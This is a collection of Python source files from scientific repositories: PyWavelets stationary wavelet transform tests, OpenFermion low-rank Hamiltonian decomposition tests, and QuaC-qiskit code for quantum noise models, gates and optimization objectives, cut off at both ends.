input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power)
X = np.arange(input_length**2).reshape(input_length, input_length)
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
(cA1, (cH1, cV1, cD1)) = pywt.swt2(X, current_wavelet, level=1)[0]
# opposite order
(cA2, (cH2, cV2, cD2)) = pywt.swt2(X, current_wavelet, level=1,
axes=(1, 0))[0]
assert_allclose(cA1, cA2, atol=atol)
assert_allclose(cH1, cV2, atol=atol)
assert_allclose(cV1, cH2, atol=atol)
assert_allclose(cD1, cD2, atol=atol)
# duplicate axes not allowed
assert_raises(ValueError, pywt.swt2, X, current_wavelet, 1,
axes=(0, 0))
# too few axes
assert_raises(ValueError, pywt.swt2, X, current_wavelet, 1, axes=(0, ))
def test_iswt2_2d_only():
# iswt2 is not currently compatible with data that is not 2D
x_3d = np.ones((4, 4, 4))
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
c = pywt.swt2(x_3d, 'haar', level=1)
assert_raises(ValueError, pywt.iswt2, c, 'haar')
def test_swtn_axes():
atol = 1e-14
current_wavelet = pywt.Wavelet('db2')
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power)
X = np.arange(input_length**2).reshape(input_length, input_length)
coeffs = pywt.swtn(X, current_wavelet, level=1, axes=None)[0]
# opposite order
coeffs2 = pywt.swtn(X, current_wavelet, level=1, axes=(1, 0))[0]
assert_allclose(coeffs['aa'], coeffs2['aa'], atol=atol)
assert_allclose(coeffs['ad'], coeffs2['da'], atol=atol)
assert_allclose(coeffs['da'], coeffs2['ad'], atol=atol)
assert_allclose(coeffs['dd'], coeffs2['dd'], atol=atol)
# 0-level transform
empty = pywt.swtn(X, current_wavelet, level=0)
assert_equal(empty, [])
# duplicate axes not allowed
assert_raises(ValueError, pywt.swtn, X, current_wavelet, 1, axes=(0, 0))
# data.ndim = 0
assert_raises(ValueError, pywt.swtn, np.asarray([]), current_wavelet, 1)
# start_level too large
assert_raises(ValueError, pywt.swtn, X, current_wavelet,
level=1, start_level=2)
# level < 1 in swt_axis call
assert_raises(ValueError, swt_axis, X, current_wavelet, level=0,
start_level=0)
# odd-sized data not allowed
assert_raises(ValueError, swt_axis, X[:-1, :], current_wavelet, level=0,
start_level=0, axis=0)
@dec.slow
def test_swtn_iswtn_integration(wavelets=None):
# This function performs a round-trip swtn/iswtn transform for various
# possible combinations of:
# 1.) 1 out of 2 axes of a 2D array
# 2.) 2 out of 3 axes of a 3D array
#
# To keep test time down, only wavelets of length <= 8 are run.
#
# This test does not validate swtn or iswtn individually, but only
# confirms that iswtn yields an (almost) perfect reconstruction of swtn.
max_level = 3
if wavelets is None:
wavelets = pywt.wavelist(kind='discrete')
if 'dmey' in wavelets:
# The 'dmey' wavelet is a special case - disregard it for now
wavelets.remove('dmey')
for ndim_transform in range(1, 3):
ndim = ndim_transform + 1
for axes in combinations(range(ndim), ndim_transform):
for current_wavelet_str in wavelets:
wav = pywt.Wavelet(current_wavelet_str)
if wav.dec_len > 8:
continue # avoid excessive test duration
input_length_power = int(np.ceil(np.log2(max(
wav.dec_len,
wav.rec_len))))
N = 2**(input_length_power + max_level - 1)
X = np.arange(N**ndim).reshape((N, )*ndim)
coeffs = pywt.swtn(X, wav, max_level, axes=axes)
coeffs_copy = deepcopy(coeffs)
Y = pywt.iswtn(coeffs, wav, axes=axes)
assert_allclose(Y, X, rtol=1e-5, atol=1e-5)
# verify the inverse transform didn't modify any coeffs
for c, c2 in zip(coeffs, coeffs_copy):
for k, v in c.items():
assert_array_equal(c2[k], v)
def test_swtn_iswtn_quick():
test_swtn_iswtn_integration(wavelets=['db1', ])
def test_iswtn_errors():
x = np.arange(8**3).reshape(8, 8, 8)
max_level = 2
axes = (0, 1)
w = pywt.Wavelet('db1')
coeffs = pywt.swtn(x, w, max_level, axes=axes)
# more axes than dimensions transformed
assert_raises(ValueError, pywt.iswtn, coeffs, w, axes=(0, 1, 2))
# duplicate axes not allowed
assert_raises(ValueError, pywt.iswtn, coeffs, w, axes=(0, 0))
# mismatched coefficient size
coeffs[0]['da'] = coeffs[0]['da'][:-1, :]
assert_raises(RuntimeError, pywt.iswtn, coeffs, w, axes=axes)
def test_per_axis_wavelets():
# tests seperate wavelet for each axis.
rstate = np.random.RandomState(1234)
data = rstate.randn(16, 16, 16)
level = 3
# wavelet can be a string or wavelet object
wavelets = (pywt.Wavelet('haar'), 'sym2', 'db4')
coefs = pywt.swtn(data, wavelets, level=level)
assert_allclose(pywt.iswtn(coefs, wavelets), data, atol=1e-14)
# 1-tuple also okay
coefs = pywt.swtn(data, wavelets[:1], level=level)
assert_allclose(pywt.iswtn(coefs, wavelets[:1]), data, atol=1e-14)
# length of wavelets doesn't match the length of axes
assert_raises(ValueError, pywt.swtn, data, wavelets[:2], level)
assert_raises(ValueError, pywt.iswtn, coefs, wavelets[:2])
# swt2/iswt2 also support per-axis wavelets/modes
data2 = data[..., 0]
coefs2 = pywt.swt2(data2, wavelets[:2], level)
assert_allclose(pywt.iswt2(coefs2, wavelets[:2]), data2, atol=1e-14)
def test_error_on_continuous_wavelet():
# A ValueError is raised if a Continuous wavelet is selected
data = np.ones((16, 16))
with warnings.catch_warnings(): # avoid FutureWarning in swt2
warnings.simplefilter('ignore', FutureWarning)
for dec_func, rec_func in zip([pywt.swt, pywt.swt2, pywt.swtn],
[pywt.iswt, pywt.iswt2, pywt.iswtn]):
for cwave in ['morl', pywt.DiscreteContinuousWavelet('morl')]:
assert_raises(ValueError, dec_func, data, wavelet=cwave,
level=3)
c = dec_func(data, 'db1', level=3)
assert_raises(ValueError, rec_func, c, wavelet=cwave)
if __name__ == '__main__':
run_module_suite()
``` |
{
"source": "0tt3r/OpenFermion",
"score": 2
} |
#### File: openfermion/utils/_low_rank_test.py
```python
import itertools
import numpy
import os
import unittest
from openfermion.config import THIS_DIRECTORY
from openfermion.hamiltonians import MolecularData
from openfermion.ops import FermionOperator
from openfermion.transforms import get_fermion_operator
from openfermion.utils import (chemist_ordered, eigenspectrum,
get_chemist_two_body_coefficients,
is_hermitian,
low_rank_two_body_decomposition,
low_rank_spatial_two_body_decomposition,
normal_ordered,
prepare_one_body_squared_evolution,
random_interaction_operator)
class ChemistTwoBodyTest(unittest.TestCase):
def test_operator_consistency(self):
# Initialize a random InteractionOperator and FermionOperator.
n_qubits = 4
random_interaction = random_interaction_operator(
n_qubits, real=False, seed=34281)
random_fermion = get_fermion_operator(random_interaction)
# Convert to chemist ordered tensor.
io_constant, io_one_body_coefficients, io_chemist_tensor = \
get_chemist_two_body_coefficients(random_interaction)
fo_constant, fo_one_body_coefficients, fo_chemist_tensor = \
get_chemist_two_body_coefficients(random_fermion)
# Ensure consistency between FermionOperator and InteractionOperator.
self.assertAlmostEqual(io_constant, fo_constant)
one_body_difference = numpy.sum(numpy.absolute(
io_one_body_coefficients - fo_one_body_coefficients))
self.assertAlmostEqual(0., one_body_difference)
two_body_difference = numpy.sum(numpy.absolute(
io_chemist_tensor - fo_chemist_tensor))
self.assertAlmostEqual(0., two_body_difference)
# Convert output to FermionOperator.
output_operator = FermionOperator()
output_operator += FermionOperator((), fo_constant)
# Convert one-body.
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = fo_one_body_coefficients[p, q]
output_operator += FermionOperator(term, coefficient)
# Convert two-body.
for p, q, r, s in itertools.product(range(n_qubits), repeat=4):
term = ((p, 1), (q, 0), (r, 1), (s, 0))
coefficient = fo_chemist_tensor[p, q, r, s]
output_operator += FermionOperator(term, coefficient)
# Check that difference is small.
difference = normal_ordered(random_fermion - output_operator)
self.assertAlmostEqual(0., difference.induced_norm())
def test_exception(self):
# Initialize a bad FermionOperator.
n_qubits = 4
random_interaction = random_interaction_operator(n_qubits, seed=36229)
random_fermion = get_fermion_operator(random_interaction)
bad_term = ((1, 1), (2, 1))
random_fermion += FermionOperator(bad_term)
# Check for exception.
with self.assertRaises(TypeError):
fo_constant, fo_one_body_coefficients, fo_chemist_tensor = (
get_chemist_two_body_coefficients(random_fermion))
class LowRankTest(unittest.TestCase):
def test_operator_consistency(self):
# Initialize a random two-body FermionOperator.
n_qubits = 4
random_operator = get_fermion_operator(
random_interaction_operator(n_qubits, seed=28644))
# Convert to chemist tensor.
constant, one_body_coefficients, chemist_tensor = (
get_chemist_two_body_coefficients(random_operator))
# Build back operator constant and one-body components.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_coefficients[p, q]
decomposed_operator += FermionOperator(term, coefficient)
# Perform decomposition.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(chemist_tensor))
self.assertFalse(trunc_error)
# Check for exception.
with self.assertRaises(ValueError):
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(chemist_tensor,
truncation_threshold=1.,
final_rank=1))
# Build back two-body component.
for l in range(n_qubits ** 2):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator ** 2)
# Test for consistency.
difference = normal_ordered(decomposed_operator - random_operator)
self.assertAlmostEqual(0., difference.induced_norm())
def test_spatial_operator_consistency(self):
# Initialize a random two-body FermionOperator.
n_qubits = 4
filename = os.path.join(THIS_DIRECTORY, 'data',
'H2_sto-3g_singlet_0.7414')
molecule = MolecularData(filename=filename)
molecule_interaction = molecule.get_molecular_hamiltonian()
molecule_operator = get_fermion_operator(molecule_interaction)
constant = molecule_interaction.constant
one_body_coefficients = molecule_interaction.one_body_tensor[:, :]
two_body_coefficients = (
molecule_interaction.two_body_tensor[:, :, :, :])
# Perform decomposition.
eigenvalues, one_body_squares, trunc_error, one_body_corrections = (
low_rank_spatial_two_body_decomposition(two_body_coefficients))
self.assertFalse(trunc_error)
# Build back operator constant and one-body components.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = (one_body_coefficients[p, q] +
one_body_corrections[p, q])
decomposed_operator += FermionOperator(term, coefficient)
# Check for exception.
with self.assertRaises(ValueError):
eigenvalues, one_body_squares, trunc_error = (
low_rank_spatial_two_body_decomposition(
two_body_coefficients,
truncation_threshold=1.,
final_rank=1))
# Build back two-body component.
for l in range(one_body_squares.shape[0]):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator ** 2)
# Test for consistency.
difference = normal_ordered(decomposed_operator - molecule_operator)
self.assertAlmostEqual(0., difference.induced_norm())
# Decompose with slightly negative operator that must use eigen
molecule = MolecularData(filename=filename)
molecule.two_body_integrals[0, 0, 0, 0] -= 1
eigenvalues, one_body_squares, trunc_error, one_body_corrections = (
low_rank_spatial_two_body_decomposition(two_body_coefficients))
self.assertFalse(trunc_error)
# Check for property errors
with self.assertRaises(TypeError):
eigenvalues, one_body_squares, trunc_error = (
low_rank_spatial_two_body_decomposition(
two_body_coefficients + 0.01j,
truncation_threshold=1.,
final_rank=1))
# Perform decomposition with threshold
test_eigenvalues, one_body_squares, trunc_error, _ = (
low_rank_spatial_two_body_decomposition(two_body_coefficients,
truncation_threshold=1.0))
self.assertTrue(len(test_eigenvalues) < len(eigenvalues))
self.assertTrue(len(one_body_squares) == len(test_eigenvalues))
self.assertTrue(trunc_error > 0.)
# Perform decomposition with threshold
test_eigenvalues, one_body_squares, trunc_error, _ = (
low_rank_spatial_two_body_decomposition(two_body_coefficients,
final_rank=1))
self.assertTrue(len(test_eigenvalues) == 1)
self.assertTrue(len(one_body_squares) == 1)
self.assertTrue(trunc_error > 0.)
def test_rank_reduction(self):
# Initialize H2.
geometry = [('H', (0., 0., 0.)), ('H', (0., 0., 0.7414))]
basis = 'sto-3g'
multiplicity = 1
filename = os.path.join(THIS_DIRECTORY, 'data',
'H2_sto-3g_singlet_0.7414')
molecule = MolecularData(
geometry, basis, multiplicity, filename=filename)
molecule.load()
# Get molecular Hamiltonian.
molecular_hamiltonian = molecule.get_molecular_hamiltonian()
# Get fermion Hamiltonian.
fermion_hamiltonian = normal_ordered(get_fermion_operator(
molecular_hamiltonian))
# Get chemist tensor.
constant, one_body_coefficients, chemist_tensor = (
get_chemist_two_body_coefficients(fermion_hamiltonian))
n_qubits = one_body_coefficients.shape[0]
# Rank reduce with threshold.
errors = []
for truncation_threshold in [1., 0.1, 0.01, 0.001]:
# Add back one-body terms and constant.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_coefficients[p, q]
decomposed_operator += FermionOperator(term, coefficient)
# Rank reduce.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(
chemist_tensor,
truncation_threshold=truncation_threshold))
# Make sure error is below truncation specification.
self.assertTrue(trunc_error < truncation_threshold)
# Reassemble FermionOperator.
l_max = eigenvalues.size
for l in range(l_max):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator**2)
# Test for consistency.
difference = normal_ordered(
decomposed_operator - fermion_hamiltonian)
errors += [difference.induced_norm()]
self.assertTrue(errors[-1] <= trunc_error or
abs(errors[-1] - trunc_error) < 1e-6)
self.assertTrue(errors[3] <= errors[2] <= errors[1] <= errors[0])
# Rank reduce by setting final rank.
errors = []
for final_rank in [4, 6, 8, 10, 12]:
# Add back one-body terms and constant.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_coefficients[p, q]
decomposed_operator += FermionOperator(term, coefficient)
# Rank reduce.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(
chemist_tensor, final_rank=final_rank))
# Reassemble FermionOperator.
l_max = eigenvalues.size
for l in range(l_max):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator**2)
# Test for consistency.
difference = normal_ordered(
decomposed_operator - fermion_hamiltonian)
errors += [difference.induced_norm()]
self.assertTrue(errors[3] <= errors[2] <= errors[1] <= errors[0])
def test_one_body_square_decomposition(self):
# Initialize a random two-body FermionOperator.
n_qubits = 4
random_operator = get_fermion_operator(
random_interaction_operator(n_qubits, seed=17004))
# Convert to chemist tensor.
constant, one_body_coefficients, chemist_tensor = (
get_chemist_two_body_coefficients(random_operator))
# Perform decomposition.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(chemist_tensor))
# Build back two-body component.
for l in range(n_qubits ** 2):
# Get the squared one-body operator.
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
one_body_squared = one_body_operator ** 2
# Get the squared one-body operator via one-body decomposition.
density_density_matrix, basis_transformation_matrix = (
prepare_one_body_squared_evolution(one_body_squares[l]))
two_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (p, 0), (q, 1), (q, 0))
coefficient = density_density_matrix[p, q]
two_body_operator += FermionOperator(term, coefficient)
# Confirm that the rotations diagonalize the one-body squares.
hopefully_diagonal = basis_transformation_matrix.dot(
numpy.dot(one_body_squares[l],
numpy.transpose(numpy.conjugate(
basis_transformation_matrix))))
diagonal = numpy.diag(hopefully_diagonal)
difference = hopefully_diagonal - numpy.diag(diagonal)
self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference)))
density_density_alternative = numpy.outer(diagonal, diagonal)
difference = density_density_alternative - density_density_matrix
self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference)))
# Test spectra.
one_body_squared_spectrum = eigenspectrum(one_body_squared)
two_body_spectrum = eigenspectrum(two_body_operator)
difference = two_body_spectrum - one_body_squared_spectrum
self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference)))
``` |
{
"source": "0tt3r/QuaC-qiskit",
"score": 3
} |
#### File: examples/demos/hadamard_example.py
```python
import math
import matplotlib.pyplot as plt
from qiskit import QuantumCircuit, execute
from qiskit.tools.visualization import plot_histogram
from quac_qiskit import Quac
def main():
circuit1 = QuantumCircuit(5, 5)
circuit2 = QuantumCircuit(5, 5)
circuit3 = QuantumCircuit(1, 1)
circuit1.h(0)
circuit2.u2(0, math.pi, 0)
circuit3.u3(math.pi/2, math.pi, 0, 0)
circuit1.measure(0, 0)
circuit2.measure(0, 0)
circuit3.measure(0, 0)
print("Available QuaC backends:")
print(Quac.backends())
simulator = Quac.get_backend('fake_vigo_density_simulator', meas=True)
# Execute the circuit on the QuaC simulator
job1 = execute(circuit1, simulator)
job2 = execute(circuit2, simulator)
job3 = execute(circuit3, simulator)
print(f"Hadamard counts: {job1.result().get_counts()}")
print(f"U2 counts: {job2.result().get_counts()}")
print(f"U3 counts: {job3.result().get_counts()}")
plot_histogram(job1.result().get_counts())
plot_histogram((job2.result().get_counts()))
plot_histogram(job3.result().get_counts())
plt.show()
if __name__ == '__main__':
main()
```
#### File: quac_qiskit/models/noise_model.py
```python
from typing import List, Dict, Tuple, Optional, Union
import warnings
import numpy as np
from scipy import sparse
from qiskit.ignis.characterization import T1Fitter, T2Fitter, ZZFitter
from qiskit.ignis.mitigation import TensoredMeasFitter
from qiskit.result import Result
from qiskit.providers import BaseBackend, BackendPropertyError
class QuacNoiseModel:
"""Defines noise to be applied to QuaC-based simulations
"""
def __init__(self, t1_times: List[float], t2_times: List[float], meas_matrices: Optional[List[np.array]] = None,
zz: Optional[Dict[Tuple[int, int], float]] = None):
"""Constructor for QuaC noise model
:param t1_times: a list of floats representing T1 relaxation times
:param t2_times: a list of floats representing T2 (note: not T2*) decoherence times
:param meas_matrices: a list of 2x2 numpy arrays representing measurement probabilities.
Given the matrix [[A, B], [C, D]] , A is the probability of measuring a qubit in state 0 given
it was prepped in state 0, and C is the probability of measuring the qubit in state 1 given it was
prepped in state 0. Similar logic can be applied to entries B and D
:param zz: a dictionary mapping ordered pairs of qubits to ZZ coupling frequency in GHz. Please note
this is in regular frequency, not angular frequency
"""
self._t1_times = t1_times
self._t2_times = t2_times
self._meas_matrices = meas_matrices
self._full_meas_matrices = []
self._zz = zz
def __str__(self):
string_representation = "Noise Model Description\n=============================="
if self.has_t1():
string_representation += "\nT1 times:"
for qubit, time in enumerate(self._t1_times):
string_representation += f"\n{qubit}: {time} ns"
if self.has_t2():
string_representation += "\nT2 times:"
for qubit, time in enumerate(self._t2_times):
string_representation += f"\n{qubit}: {time} ns"
if self.has_meas():
string_representation += "\nMeasurement error matrices:"
for qubit, mat in enumerate(self._meas_matrices):
string_representation += f"\n{qubit}: {mat}"
if self.has_zz():
string_representation += "\nZZ coupling terms:"
for pair, value in self._zz.items():
string_representation += f"\n{pair}: {value} GHz"
return string_representation
def has_t1(self) -> bool:
"""Check if T1 noise was defined
:return: a boolean
"""
return not (float('inf') in self._t1_times and len(set(self._t1_times)) == 1)
def has_t2(self) -> bool:
"""Check if T2 noise was defined
:return: a boolean
"""
return not (float('inf') in self._t2_times and len(set(self._t2_times)) == 1)
def has_meas(self) -> bool:
"""Check if measurement error was defined
:return: a boolean
"""
return self._meas_matrices is not None
def has_zz(self) -> bool:
"""Check if ZZ coupling noise was defined
:return: a boolean
"""
return self._zz is not None
def t1(self, qubit: int) -> float:
"""T1 getter method
:param qubit: an integer
:return: T1 time in nanoseconds
"""
return self._t1_times[qubit]
def t2(self, qubit: int) -> float:
"""T2 getter method
:param qubit: an integer
:return: T2 time in nanoseconds
"""
return self._t2_times[qubit]
def meas(self) -> List[sparse.csr_matrix]:
"""Measurement error matrix getter
:return: a list of sparse matrices ready for application
"""
if len(self._full_meas_matrices) == 0:
self.build_full_measurement_matrices()
return self._full_meas_matrices
def flip_prob(self, qubit: int, prep: int, meas: int):
"""The probability a qubit is in state meas after being prepared
in state prep
:param qubit: integer
:param prep: integer (0 or 1)
:param meas: integer (0 or 1)
:return: a float
"""
return self._meas_matrices[qubit][prep][meas]
def zz(self, qubit1: Optional[int] = None, qubit2: Optional[int] = None) -> Union[List[Tuple[int, int]], float]:
"""ZZ getter method
:param qubit1: an integer
:param qubit2: an integer
:return: ZZ frequency in GHz (or a list of defined qubit pairs if either argument is None)
"""
if qubit1 is None or qubit2 is None:
return list(self._zz.keys())
return self._zz[(qubit1, qubit2)]
@staticmethod
def get_noiseless_model(n_qubits: int):
"""Returns a QuacNoiseModel that is effectively noiseless
:param n_qubits: number of qubits, an integer
:return: a noiseless QuacNoiseModel
"""
return QuacNoiseModel([float('inf')] * n_qubits, [float('inf')] * n_qubits)
@classmethod
def from_backend(cls, backend: BaseBackend, **kwargs):
"""Automatically loads a QuaC noise model given a backend of type BaseBackend. Primarily
for speeding up definition of IBMQ hardware noise models in QuaC
:param backend: an object of type BaseBackend
:param kwargs: an optional dictionary mapping strings to booleans stating which types
of noise to include (keys are t1, t2, meas, and zz)
:return: a QuacNoiseModel object
"""
n_qubits = len(backend.properties().qubits)
qubits = list(range(n_qubits))
# Set up defaults
t1_times = [float('inf') for _ in range(n_qubits)]
t2_times = [float('inf') for _ in range(n_qubits)]
meas_matrices = None
zz = None
# Adjust defaults as appropriate
if kwargs.get("t1"):
t1_times = [backend.properties().t1(qubit) * 1e9 for qubit in qubits]
if kwargs.get("t2"):
t2_times = [backend.properties().t2(qubit) * 1e9 for qubit in qubits]
if kwargs.get("meas"):
meas_matrices = []
# Construct probability matrix for measurement error adjustments
for qubit in range(n_qubits):
# Not all backends have measurement errors added
try:
prob_meas0_prep1 = backend.properties().qubit_property(qubit, "prob_meas0_prep1")[0]
prob_meas1_prep0 = backend.properties().qubit_property(qubit, "prob_meas1_prep0")[0]
except BackendPropertyError:
warnings.warn("Measurement error simulation not supported on this backend")
break
qubit_measurement_error_matrix = np.array([
[1 - prob_meas1_prep0, prob_meas0_prep1],
[prob_meas1_prep0, 1 - prob_meas0_prep1]
])
meas_matrices.append(qubit_measurement_error_matrix)
if kwargs.get("zz"):
warnings.warn("ZZ coupling not supported in automatic loading")
return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz)
@classmethod
def from_calibration_results(cls, backend: BaseBackend, t1_result: Tuple[np.array, Result],
t2_result: Tuple[np.array, Result], meas_result: Result,
zz_results: Dict[Tuple[int, int], Tuple[np.array, float, Result]]):
"""Takes results from running calibration circuits on hardware and constructs a
QuacNoiseModel object
:param backend: the backend on which the circuits were run (a BaseBackend object)
:param t1_result: a tuple with a list of delay times (in ns) as the 0th element and the T1
calibration Result object as the 1st element
:param t2_result: a tuple with a list of delay times (in ns) as the 0th element and the T2
calibration Result object as the 1st element
:param meas_result: a Result object from running measurement calibration circuits
:param zz_results: a dictionary mapping tuples of qubit indices to a ZZ coupling calibration circuit
Result object
:return: a QuacNoiseModel object
"""
n_qubits = len(backend.properties().qubits)
qubits = list(range(n_qubits))
# Set up defaults
t1_times = [float('inf') for _ in range(n_qubits)]
t2_times = [float('inf') for _ in range(n_qubits)]
meas_matrices = None
zz = None
# Adjust defaults as appropriate
if t1_result:
t1_fit = T1Fitter(t1_result[1], t1_result[0], qubits,
fit_p0=[1, 1e5, 0],
fit_bounds=([0, 0, -1], [2, 1e10, 1]),
time_unit="nano-seconds")
t1_times = t1_fit.time()
if t2_result:
t2_fit = T2Fitter(t2_result[1], t2_result[0], qubits,
fit_p0=[1, 1e4, 0],
fit_bounds=([0, 0, -1], [2, 1e10, 1]),
time_unit="nano-seconds")
t2_times = t2_fit.time()
if meas_result:
meas_fit = TensoredMeasFitter(meas_result, [[qubit] for qubit in qubits])
meas_matrices = meas_fit.cal_matrices
if zz_results:
zz = {}
for qubit1 in qubits:
for qubit2 in qubits:
if qubit1 < qubit2:
zz_information = zz_results[(qubit1, qubit2)]
xdata, osc_freq, zz_result = zz_information
zz_fit = ZZFitter(zz_result, xdata, [qubit1], [qubit2],
fit_p0=[1, osc_freq, -np.pi / 20, 0],
fit_bounds=([-0.5, 0, -np.pi, -0.5],
[1.5, 1e10, np.pi, 1.5]),
)
zz[(qubit1, qubit2)] = zz_fit.ZZ_rate()[0]
return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz)
@classmethod
def from_array(cls, array: np.array, n_qubits: int):
"""Convert an array to a QuacNoiseModel. Array must contain T1 and T2 times at a
minimum
:param array: a Numpy array
:param n_qubits: the number of qubits simulated
:return: a QuacNoiseModel object
"""
list_array = list(100000 * array)
# T1 and T2 times
t1_times = list_array[:n_qubits]
t2_times = list_array[n_qubits:2 * n_qubits]
if len(array) == 2 * n_qubits:
return QuacNoiseModel(t1_times, t2_times, None, None)
# Measurement error
meas_diagonals = list_array[2 * n_qubits:4 * n_qubits]
meas_matrices = []
for qubit in range(n_qubits):
diagonal = meas_diagonals[2 * qubit:2 * qubit + 2]
meas_matrices.append(np.array([
[diagonal[0], 1 - diagonal[1]],
[1 - diagonal[0], diagonal[1]]
]))
if len(array) == 4 * n_qubits:
return QuacNoiseModel(t1_times, t2_times, meas_matrices, None)
# ZZ coupling error
zz_compressed = list_array[4 * n_qubits:]
zz = {}
zz_ind = 0
for qubit1 in range(n_qubits):
for qubit2 in range(n_qubits):
if qubit1 < qubit2:
zz[(qubit1, qubit2)] = zz_compressed[zz_ind]
zz_ind += 1
return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz)
def to_array(self) -> np.array:
"""Converts a QuacNoiseModel object to an array. Especially useful for optimization
:return: a Numpy array
"""
n_qubits = len(self._t1_times)
# Add T1 and T2 floats
list_form = self._t1_times + self._t2_times
# Add diagonal elements of 2x2 measurement matrices in qubit order
if self.has_meas():
for meas_matrix in self._meas_matrices:
list_form += list(meas_matrix.diagonal())
if self.has_zz():
# Add zz coupling in order (0, 1), (0, 2) ...
for qubit1 in range(n_qubits):
for qubit2 in range(n_qubits):
if qubit1 < qubit2:
list_form.append(self._zz[(qubit1, qubit2)])
return np.array(list_form) / 100000
def build_full_measurement_matrices(self):
"""Uses Kronecker product on 2x2 measurement matrices to compose a list of matrices that,
when all applied to a QuaC bitstring probability vector, result in a new bitstring
probability vector adjusted for measurement noise
"""
n_qubits = len(self._t1_times)
full_meas_matrices = []
if self._meas_matrices is None:
return [sparse.eye(n_qubits) for _ in range(n_qubits)]
for qubit in range(n_qubits):
expanded_qubit_meas_mat = sparse.csr_matrix(np.array([1]))
for ind in range(n_qubits):
if qubit == ind:
expanded_qubit_meas_mat = sparse.kron(expanded_qubit_meas_mat,
self._meas_matrices[qubit],
format='csr')
else:
expanded_qubit_meas_mat = sparse.kron(expanded_qubit_meas_mat,
sparse.eye(2),
format='csr')
full_meas_matrices.append(expanded_qubit_meas_mat)
self._full_meas_matrices = full_meas_matrices
```
#### File: quac_qiskit/models/quac_gates.py
```python
from qiskit.quantum_info import Operator
class SpecialQuacGates:
"""Contains special gates supported in QuaC"""
@staticmethod
def get_gate_unitary(name: str) -> Operator:
"""Returns a Qiskit operator for various types of QuaC-supported (but not Qiskit-supported)
gates that can be used to construct and add a unitary representing said gate to a Qiskit
circuit.
:param name: the name of the special QuaC-supported gate (czx, cmz, or cxz)
:return: an operator corresponding to the gate name provided. If the name is unrecognized,
a 4x4 identity operator will be returned
"""
if name.lower() == "czx":
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, -1],
[0, 0, 1, 0]
])
elif name.lower() == "cmz":
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]
])
elif name.lower() == "cxz":
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, -1, 0]
])
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
])
```
#### File: quac_qiskit/optimization/objective.py
```python
from typing import List
import numpy as np
from qiskit import QuantumCircuit, execute
from qiskit.result import Result
from quac_qiskit.stat import kl_dist_smoothing, discrete_one_samp_ks, get_vec_angle
from quac_qiskit.format import counts_to_list
from quac_qiskit.models import QuacNoiseModel
def kl_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float:
"""Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of
K-L divergence between circuit result distributions for each circuit is computed
:param circuits: a list of QuantumCircuit objects
:param simulation_result: a Qiskit Result object
:param reference_result: a Qiskit Result object
:return: a float representing the total K-L divergence between distributions of all circuits
"""
total_kl_div = 0
for circuit in circuits:
simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit)))
simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator
reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit)))
reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator
total_kl_div += kl_dist_smoothing(reference_dist, simulation_dist, 1e-5)
return total_kl_div
def ks_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float:
"""Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of
K-S distance between circuit result distributions for each circuit is computed
